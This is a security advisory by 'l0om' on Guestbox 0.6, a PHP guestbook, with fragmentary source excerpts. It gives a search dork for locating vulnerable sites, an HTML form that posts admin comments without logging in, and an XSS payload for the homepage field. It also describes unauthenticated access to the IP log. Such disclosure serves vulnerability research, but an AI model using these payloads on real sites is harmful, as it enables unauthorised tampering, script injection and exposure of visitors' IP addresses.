Security advisory for Guestbox 0.
`author.: l0om -
product: guestbox (latest non-BETA) 0.6
dork: "Login - Guestbox 0.6" inurl:guestbox.php
someone asked me to check the guestbook named "guestbox" and thats
the advisory based on my checks.
1.0 everyone can set admin comments to all entries
in case of setting an admin comment to some gb entry you normaly have
to log in as admin. as you can see in the sources down you dont need
to be logged in as admin to set an admin comment because the programmer
missed it to check the "$admin" value at this point of the switch case.
simply create the following html document and post comments as admin:
<form method="post" action="http://WWW.THEPAGE.COM/gb/action.php?action=comment&nummer=ENTRY_NUMBER">
<textarea class="auswahl" name="text" cols="30" rows="3"></textarea><br>
<input type="submit" name="submit" value="comment">
---8<--- source:action.php ---8<---
INCLUDE "gb_config.php";
INCLUDE "gb_functions.php";
switch ($_GET['action'])
case "comment" :
if (isset($_POST['submit'])) {
// admin check????
edit_entry($gbdaten, $_GET['nummer'], trim(get_entry($gbdaten, $_GET['nummer'])).preg_replace("/(\015\012)|(\015)|(\012)/","<br />",html
// like this
if ($admin == 1) {
<input type=\"submit\" name=\"submit\" value=\"comment\">
if ($admin == 1) {
while(feof($datei)==0) {
2.0 XSS/HTML injection
if you add an entry to the guestbook you can inject javascript code.
there have to be "magic_quotes_gpc" set to "Off" in your php.ini for injection as
it will otherwise qoute out all your GET/POST data...
the sources says:
if (preg_match("/http:\/\/.+/i", $data[3])) {
$homepage="<a href=\"$data[3]\" target=\"_blank\"><img src=\"./home.gif\" border=0 alt=".$data[3]."></a>";
what can be exploited with the following string in the "hompage" field.:
http://"><script>alert('your mom...');</script>
btw: there are a few other ways to inject code to the gb.
if "magic_quotes_pgc" is set to "On" you still can INJECT HTML of course.
3.0 view IPs
for normal its an admin feature to view the ip address of the host which have added the
entry to the guestbook. simply view the guestbook with all data for all entrys with opening
the "<url>/gb/gblog" does the trick for everyone as well.
have phun,
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